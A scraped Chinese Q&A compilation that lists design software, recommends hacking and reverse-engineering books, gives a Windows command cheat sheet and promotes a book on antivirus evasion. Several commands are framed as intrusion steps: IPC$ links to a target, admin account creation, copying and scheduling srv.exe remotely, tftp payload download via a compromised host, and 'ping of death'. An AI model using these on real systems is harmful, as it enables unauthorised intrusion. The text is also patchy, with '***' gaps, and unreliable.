电脑黑客技术书集_黑客书籍设计软件电脑
文字日记:
书籍版式设计都有哪些相关软件?
1 Adobe Photoshop 简体中文 软件类别: 图像处理
Adobe Illustrator CS v11 软件语言: 英文 软件类别: 图像处理 运行环境: Win9x/NT/2000/XP/ Photoshop是著名的图象处理软件
Photoshop是著名的图象处理软件, 为美国ADOBE公司出品。在修饰和处理摄影作品和绘画作品时,具有非常强大的功能
2 Adobe Illustrator CS v11 Adobe Illustrator是一套被设计用来作输出及网页 *** 双方面用途、功能强大且完善的绘图软件包,这个专业的绘图程序整合了功能强大的向量绘图工具、完整的PostScript输出,并和Photoshop或其它Adobe家族的软件紧密地结合。 第10版增加了诸如Arc、矩型网格线(Rectangular Grid)以及坐标网格线(Polar Grid)工具等新的绘图及自动化优点;增加编辑的灵活度以及标志(编辑主要的对象或图像复制)。你可以运用笔刷及其它如合并、数据驱动坐标等在工具列上的创造工具,帮助你建立联结到数据库的样版。 新的Illustrator还提供更多的 *** 生产功能,包括裁切图像并支持可变动向量绘图档(SVG)增强。
3 Fireworks MX 2004 简体中文版软件语言: 简体中文 软件类别: 图像处理
4 AutoCAD 设计
5 Corel DRAW
6 三维动画软件 3D Studio(3DS)。它的全称是 3-Dimension Studio,译成中文应该是“三维影像 *** 室”。 3D Studio MAX(以下简称 MAX)是以 3DS 4.x为基础的升级版本,它以全新的 Windows界面及更强大的功能展示在我们面前。用MAX来 *** 三维动画就像是当一个大导演——一切的角色、道具、灯光、摄像机、场景(包括如云、雾、雪、闪电等特效场面)及配音、镜头的剪辑合成等等都任你来安排处理。如果你是一位设计家,用MAX来设计产品模型的感觉就像是雕塑家和魔术师,复杂的模型几乎是在瞬间就奇迹般地建立起来了。而用MAX修改创建的模型更是轻而易举的事,完全可以把宝贵的时间和精力集中用在使设计更加完美更加理想上。无论是出于何种目的使用 MAX,一定会充分体会到用计算机工作时的那种“工作就是玩,玩就是工作”的 *** 。
可以毫不夸张地说,哪里需要三维设计、哪里需要三维动画,哪里就需要MAX。MAX适合于从事下列任何一种职业的专家或业余爱好者:电影特技、立体和影视动画广告设计、工业设计、建筑和室内装潢设计、包装与装潢设计、三维游戏开发、软件开发程序员( *** 软件片头)、教学多媒体演示 *** 、军事科学研究和物理、化学或生物化学研究以及所有对三维动画和立体造型感兴趣的广大电脑玩家等。
7 MAYA因其强大的功能在3D动画界造成巨大的影响,已经渗入到电影、广播电视、公司演示、游戏可视化等各个领域,且成为三维动画软件中的佼佼者。《星球大战前传》、《透明人》、《黑客帝国》、《角斗士》、《完美风暴》、《恐龙》等到很多大片中的电脑特技镜头都是应用MAYA完成的。逼真的角色动画、丰富的画笔,接近完美的毛发、衣服效果,不仅是影视广告公司对MAYA情有独钟,许多喜爱三维动画 *** ,并有志向影视电脑特技方向发展的朋友也为MAYA的强大功能所吸引。
8 非线性编辑软件 Adobe Premiere
由ADOBE公司出品的PREMIERE,功能强大,操作方便,在非编软件中处于领先地位.由它首创的时间线编辑概念已成为行业标准.PREMIERE是一个集音频视频为一体的后期非线性编辑软件,其通用性,兼容性很强,支持众多的图形,视频,音频格式,还支持很多强大的第三方插件,并支持市面上大多数视频卡,成为非线性编辑系统中的核心软件,是影视后期 *** 中进行非线性编辑的有力工具.PREMIERE广泛应用在视频 *** 的各个领域:电视,多媒体,游戏, *** *** 等许多方面,具有广泛的实用性
学习黑客用什么书?
初学先看:《黑客X档案》(月刊),《傻瓜黑客》《黑客饕餮大餐》《黑客入门》等; 再看:《黑客手册》(月刊),语言,如:C/C++,VB,JAVA,ASP,PHP,.NET等.看兴趣再看《黑客编程》《精通黑客免杀》《加密与解密》《精通脚本黑客》; 然后看《黑客防线》(要是不会语言就别看了,浪费时间的),还有协议、数据库、无线电、内核、系统有关的资料和书。
黑客是一个中文词语,皆源自英文hacker,随着灰鸽子的出现,灰鸽子成为了很多假借黑客名义控制他人电脑的黑客技术,于是出现了“骇客”与"黑客"分家。2012年电影频道节目中心出品的电影《骇客(Hacker) 》也已经开始使用骇客一词,显示出中文使用习惯的趋同。实际上,黑客(或骇客)与英文原文Hacker、Cracker等含义不能够达到完全对译,这是中英文语言词汇各自发展中形成的差异。Hacker一词,最初曾指热心于计算机技术、水平高超的电脑专家,尤其是程序设计人员,逐渐区分为白帽、灰帽、黑帽等,其中黑帽(black hat)实际就是cracker。在媒体报道中,黑客一词常指那些软件骇客(software cracker),而与黑客(黑帽子)相对的则是白帽子。
我想自学计算机请问我要要买那些最基础的资料书啊
1.《黑客入门》
这是我看的之一本黑客书籍,是比较初级的一些黑客知识,但是后面的实例运用到了html代码,主要是讲
网页方面入侵知识,当时我自己也看不懂那些,因此就去把html学一下(其实也就是看看代码而已,自己
根本写不出啥代码来,呵呵……)
2.《30天打造专业红客》
任何一本写着什么几天精通,几天速成的书,其实都是不可信的,但这不是我们现在要讲的问题,这本书
可以弥补上本书中的本足之处,里面有一些内容可能讲得会比较详细些,适合初学者。
3.《防黑档案》
这本书是东方飘云写的,好像就是绿色兵团的副司令吧,呵呵,我先顶一下…………
4.《黑客攻防实战入门》
这是一本以实战为主线的黑客书籍,大力推荐!!!必竟电脑技术本来就是要在实践中才能提高的,光靠
理论是行不通,你可以边看此书边操作,相信对于你的实战能力会有所帮助的。
上面这些都是一些黑客入门方面的书籍,其中有部分是相同,大家可择其善者而从之!!!
5.《C语言程序设计》
不学编程的人是永远不可能成为黑客的,因此学编程也成为我们在学黑道路上的必经之路,也是最需要精
力与耐力的过程。这本就是谭浩强写的那本,大家也可以看看老外写的那本《the c programe language》,
如果你能将书中的代码都自己调试操作一遍,对于C语言基础知识的掌握应该不成问题。
6.《VC++深入详解》
这是一本他人根据孙鑫的视频教程编写的一本书,因此这本书也就有其配套视频了,地址如下:
7.《IBM-PC汇编语言程序设计》
这是清华大学出版的,虽然有点过时了,是本16位机器时代的,与现在的win32,win64有点差别,但其本
质也是大同小异的,相信对于想学习逆向分析的战友们,汇编也是一项必修课啊,关于此书,各位可以看
看中山大学的汇编语言视频教程,其教学方式也是比较新颖的,大家一看便知,地址如下:
如果想要看在线视频,可通过下面地址查看:,
将后面的hb01改为02,03……即可,不过很慢,缓冲都要N久,我是等得不耐烦了,呵呵
8.《windows环境下的32位汇编语言程序设计》
就是罗云彬写的那本,如果你学完了上本汇编书籍或视频,那么就可以开始学习win32汇编了,要知道这本
书我是用手机看的,呵呵,不容易啊,因为缺乏实践,因此自己学得也不咋滴,自己是打算先简单看一遍
,简单了解个大概,再看第二遍,这遍以实践操作为主,最后再系统地复习一遍,这项任务,本人尚未完
成啊,以上意见也只是给大家做个参考而已,希望对大家有所帮助。
9.《ASP从入门到精通》
想学脚本入侵的战友,脚本语言是一定要学的,有机会也更好自己做个博客之类的站点。这本书后面有很
多的实例项目,如后台管理,收费系统等等。另外还有一本我自己看过的关于asp的书——《ASP可视化编
程与应用》,此书是在dreamweaver下面的实践操作,也算是在学asp的同时,也学习一下dreamweaver的
使用,一举两得。这两本书中对html以及vbscript均有所讲解,因为asp中可嵌入vbscript,javascript.
10.《php高手宝典》
此书我是没看过,只是看了下目录与开头而已,打算后面有时间再补看一下,因此对此书我也没有什么发
言权了,有看过的战友可以发表一下意见。
11.《黑客反汇编揭秘》
这是一本关于逆向分析的书,与其配套的还有一本叫《黑客调试技术揭秘》,反汇编这本书网上有电子书
,大家可下载来看,pdf格式的,但是调试这本书我没找到,在网上写着调试的书名,下载下来才发现是反
汇编那本书.这两本书对汇编知识均有一定的要求,因此建议大家先学完汇编再看。
12.《 *** 黑客加密与解密》
这本书里面有一些脚本入侵方面的一点知识,内容较少,主要是讲加解密方面的知识,后面有大部分的破
解实例讲解,但注释较少,我自己当时也是看得迷糊迷糊的(没办法,自己汇编能力差点,呵呵)
13.《加密解密全方位学习》
这本书我是在图书馆看到的,适合加解密初学者,因为这本书要求的预备知识不高,只要有点C语言基础就
可以,里面会讲到一些相对简单些的汇编指令,以及crackme的简单 *** ,还有注册机的编写(个人觉得不
是很详细)
14.《加密与解密》
就是看雪学院那本书,第三版快出来了,就在这一二月份吧!我 看的是第二版的电子书,还没看完,这本
书在加解密方面写得算是比较完整详细的了,而且是从基础讲起,循序渐进,大力推荐,若要学习逆向工
程,看雪学院也确实是个不错的地方。
15.《shellcode编程揭秘》
这是一本关于缓冲区溢出攻击的书,我自己也没看过,不过电子书倒是有,就放在邮箱里面,呵呵,打算
后面再看,关于溢出攻击的书还有很多,如《 *** 渗透技术》,《缓冲区溢出攻击检测,预防,剖析》,
《the shellcode handbook》
16.《深入理解计算机系统》
此书也是我在图书馆借的,被我霸占了半年之久,这次又被我借回来复习一下了(真对不起各位书友啊,
呼呼……),这是一本站在程序员的角度写的一本书,因此也必须要有C语言基础,要是有unix系统的操作
经验会更好,因为这本书中的代码就是在UNIX下调试操作的。相信这本书对于你学出更好的代码会有一定
的帮助,其中还有特别的一章用来讲解如何编写高效的程序,并以一个实例代码来讲解,一步步地进行完
善,最终写出一个高效率的程序。这本书也是学溢出攻击方面的基础知识,在安全焦点上也说这本书是《
*** 渗透技术》的基础知识,但看完这本书也不一定能看懂网渗,呵呵……
17.《rootkit:windows内核安全防护》
内容简介
本书是目前之一本关于rootkit的详尽指南,包括rootkit的概念、它们是怎样工作的、如何构建和检测它们
。世界顶级软件安全专家、rootkit.com创始人Greg Hoglund和James Butler向大家详细介绍攻击者是如何
进入系统并长期驻留而不会被检测到的,以及黑客是如何摧毁Windows XP和Windows 2000内核系统的,
其概念可以应用于现代任何主流操作系统。通过本书,读者可以全面掌握rootkit,提升自己的计算机安全
防范能力.
18.《0day安全:软件漏洞分析技术》
四月份刚出版的,看雪论坛的,有看过一部分学得还不错,适合对溢出感兴趣的战友们。要告诉你点常识…虽然多,但都是基本的!希望你可以用心去学!
DOS 命令
net use ipipc$ " " /user:" " 建立IPC空链接
net use ipipc$ "密码" /user:"用户名" 建立IPC非空链接
net use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:
net use h: ipc$ 登陆后映射对方C:到本地为H:
net use ipipc$ /del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名 密码 /add 建立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup administrators 用户名 /add 把"用户"添加到管理员中使其具有管理员权限,注意:
administrator后加s用复数
net start 查看开启了哪些服务
net start 服务名 开启服务;(如:net start telnet, net start schedule)
net stop 服务名 停止某服务
net time 目标ip 查看对方时间
net time 目标ip /set 设置本地计算机时间与"目标IP"主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view ip 查看对方局域网内开启了哪些共享
net config 显示系统 *** 设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的 *** 连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C:共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的 *** 连接情况,常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:"-w数字"用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:"-l[空格]数据包大小";"-n发送数据次数";"-t"指一直
ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参
数"/all"显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-
H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如"DEL/AR *.*"表示删除当前目录下所有只读文件,"DEL/A-
S *.*"表示删除当前目录下除系统文件以外的所有文件
二:
del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统
确认就直接删除。(二个命令作用相同)
move 盘符路径要移动的文件名 存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中," "和" " 是重定向命
令
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
at id号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP(属telnet登陆后的命令)
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径文件名1 路径文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
copy c:srv.exe ipadmin$ 复制本地c:srv.exe到对方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:
2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
copy ipadmin$svv.exe c: 或:copyipadmin$*.* 复制对方admini$共享下的srv.exe文件(所有文
件)至本地C:
xcopy 要复制的文件或目录树 目标地址目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:server.exe 登陆后,将"IP"的
server.exe下载到目标主机c:server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式
(传送文本文件模式)进行传送
tftp -i 对方IP put c:server.exe 登陆后,上传本地c:server.exe至主机
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文
本文件时)
route print 显示出IP路由,将主要显示 *** 地址Network addres,子网掩码Netmask,网关地址Gateway
addres,接口地址Interface
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并更大化(最小化)运行某程序或命令 望采纳O(∩_∩)O
黑客X档案的《黑客免杀入门》这本书怎么样?
A1Pass大牛写的,国内实力派黑客团队EST(邪恶八进制)成员……
我就是在百度知道里认识他的,为人比较低调。^_^
这本书还有EST老大 冰雪封情 的写的推荐序,貌似阵容很强大!!
这本书我买了,讲的全面并且深入,个人认为还不错。
以下是我在他博客摘录的:
***********************************************
定价:32元(240页,140千字)
简介:
现在的 *** 病毒木马横行,每天都有数百种新型病毒与木马出现,而这其中相当大的一部分其实就是经过骇客们免杀处理的变种。因此为了使想研究免杀技术的病毒防御工作者与黑客技术爱好者更加透彻与系统的了解免杀技术,我在黑客X档案的支持下写了这本书,意在给需要它的人一个详尽的参考,并对免杀技术做一个比较系统的阐述。
《黑客免杀入门》是现在国内仅有的几本免杀技术书籍之一。鉴于免杀技术的性质与其它已上市图书的特点,本书除了详尽的介绍了免杀 *** 外,更兼顾了免杀原理与思路突破的介绍,并驳斥了 *** 与书本上关于免杀技术的一些错误理论,而且对圈内的部分模糊概念作了详尽的澄清,真正做到了一些具有突破性质的原理介绍,作者之所以下如此大的精力研究这些,只是为争取使本书的读者更加透彻的了解免杀技术。
除此之外,书中使用简单易懂的语言阐述了现在某些专业杀毒防毒书籍中都未曾提到起的一些珍贵资料,使您在反向更加了解现有免杀 *** 的优点与缺点。因此,相信本书会成为一本初学者与高手都认为物有所值的著作,更相信本书会使您爱上免杀技术。
涉及内容:
各种免杀技术、手动脱壳、改壳、汇编、简单的逆向工程、汉化等
适合读者:
1、对杀毒或黑客技术感兴趣的朋友。
这本书将带领您进入免杀这个没有硝烟的智力战场。
2、免杀爱好者。
这本书将是您很好的参考手册
3、电脑病毒防御工作人员。
正可谓知己知彼,百战不殆!在您了解了各种免杀原理与思想后,相信会帮助您在杀毒软件发展与创新方面快速取得灵感。
4、对软件加密、解密感兴趣的朋友。
一、和我一起来认识免杀
1.1 什么是免杀
1.2 免杀的发展史
1.3 免杀能做什么
二、组建试验环境
2.1 我们需要什么
2.2 安装虚拟机
2.2.1 影子系统的安装与使用
2.2.2 VMware虚拟机的安装与使用
2.3 杀毒软件的安装与设置
2.4 认识我们的免杀利器
三、免杀基础知识
3.1 杀毒软件的原理与杀毒技术简介
3.1.1 杀毒软件工作原理
3.1.2 基于文件扫描的杀毒技术
3.1.3 基于内存扫描的杀毒技术
3.1.4 杀毒技术前沿
3.1.5 杀毒技术展望
3.2 了解PE文件
3.2.1 什么是PE文件
3.2.2 认识PE文件
3.3 文件免杀原理
3.3.1 什么是特征码
3.3.2 文件免杀原理
3.4工具脱壳技巧
3.4.1 专用脱壳工具脱壳
3.4.2 使用通用脱壳工具
四、特征码免杀技术
4.1 战前热身——脚本木马免杀实例
4.1.1理想状态下的免杀
4.1.2脚本木马也要玩“花指令”
4.2 特征码定位原理
4.2.1 CCL特征码定位原理
4.2.2 MYCCL特征码定位原理
4.2.3 MultiCCL特征码定位原理
4.3 脚本木马定位特征码技巧
4.4 MYCCL查找文件特征码
4.4.1 MYCCL的典型应用
4.4.2 针对MYCCL的一点思考
4.5 MYCCL查找内存特征码
4.6 MultiCCL使用技巧
4.6.1 MultiCCL介绍
4.6.2 MultiCCL定位文件特征码
4.6.3 MultiCCL定位内存特征码
4.6.4 由MultiCCL想到的
4.7 特征码修改 ***
4.7.1 简单的特征码修改
4.7.2 特征码修改进阶
五、其他免杀技术
5.1 改文件头免杀
5.1.1 操作篇
5.1.2 原理篇
5.2 入口点免杀技术
5.2.1 操作篇
5.2.2 原理篇
5.3 使用Vmprotect加密
5.3.1 操作篇
5.3.2 原理篇
5.4 Restorator资源修改
5.4.1 操作篇
5.4.2 原理篇
5.5 Overlay附加数据处理及应用
5.5.1 操作篇
5.5.2 原理篇
5.6 Sys免杀修改技巧
5.6.1 sys文件的常见免杀 ***
5.6.2 sys文件的手工免杀思路
5.7 补丁在免杀中的应用
5.7.1 操作篇
5.7.2 原理篇
5.8 免杀根基——PE文件介绍
5.8.1 PE文件格式
5.8.2 虚拟内存的简单介绍
5.8.3 PE文件的内存映射
5.9 PE文件中的免杀技术
5.9.1 移动PE文件头位置免杀
5.9.2 输入表移动免杀
5.9.3 输出表移动免杀
5.10 网页木马的免杀技术
5.10.1 脚本木马免杀
5.10.2小论网页木马的免杀
六、免杀与花指令
6.1 什么是花指令
6.2 脚本木马的花指令应用
6.3 花指令根基——了解汇编语言
6.3.1 认识汇编
6.3.2 由汇编语言想到的——通过反汇编添加任意功能
6.4 花指令入门
6.5 花指令在免杀领域的应用
6.5.1 花指令的应用技巧
6.5.2 花指令的修改技巧简介
6.5.3 空白区域寻找与加空白区段
6.6 花指令的高级应用
6.6.1 花指令的提取与快速应用
6.6.2 SEH异常的应用
七、免杀与壳
7.1 什么是壳
7.2 壳的基础知识
7.3 壳在免杀领域的应用
7.3.1 加壳的免杀原理
7.3.2 FreeRes多重加壳
7.4 壳的修改技巧
7.4.1 壳的初级修改
7.4.2 *** 通用补丁
7.5 手工脱壳技巧
7.5.1 手工脱壳基础
7.5.2 SFX自解压法脱壳
7.5.3 出口标志法脱dePack壳
7.5.4 单步跟踪法脱壳
7.5.5 经典的ESP定律脱壳
7.5.6 最后一次异常法脱壳
7.5.7 内存镜像法脱壳
7.5.8 模拟跟踪法脱壳
7.5.9 非完美脱壳后的程序修复
八、免杀技术前沿
8.1 杀毒与免杀技术的发展
8.2 启发式杀毒原理
8.2.1 启发式杀毒原理
8.2.2 启发性标志详解
8.3 针对启发式杀毒的免杀 ***
8.4 主动防御的原理
8.4.1 初探主动防御
8.4.2 主动防御的原理
8.5 针对主动防御的免杀 ***
8.5.1 剖析主动防御的弱点
8.5.2 修改时间攻破卡巴斯基
8.5.3 通过主动防御特征码来突破瑞星主防
8.5.4 手工打造突破主动防御
8.6 与杀毒软件的对抗
九、免杀技术补白
9.1 综合免杀实例
9.1.1 策划安排
9.1.2 设计免杀流程与免杀对策
9.1.3 设计免杀执行方案
9.1.4 按照执行方案执行免杀操作
9.2 免杀中的汉化技术
9.2.1 VB程序的汉化与修改
9.2.2 C程序的汉化与修改
9.2.3 Delphi程序的汉化与修改
9.3 病毒命名规则初探
9.4 关于免杀的几个FAQ
****************************************************
给点奖励分吧……
下一篇:网络黑客求职_黑客面试老板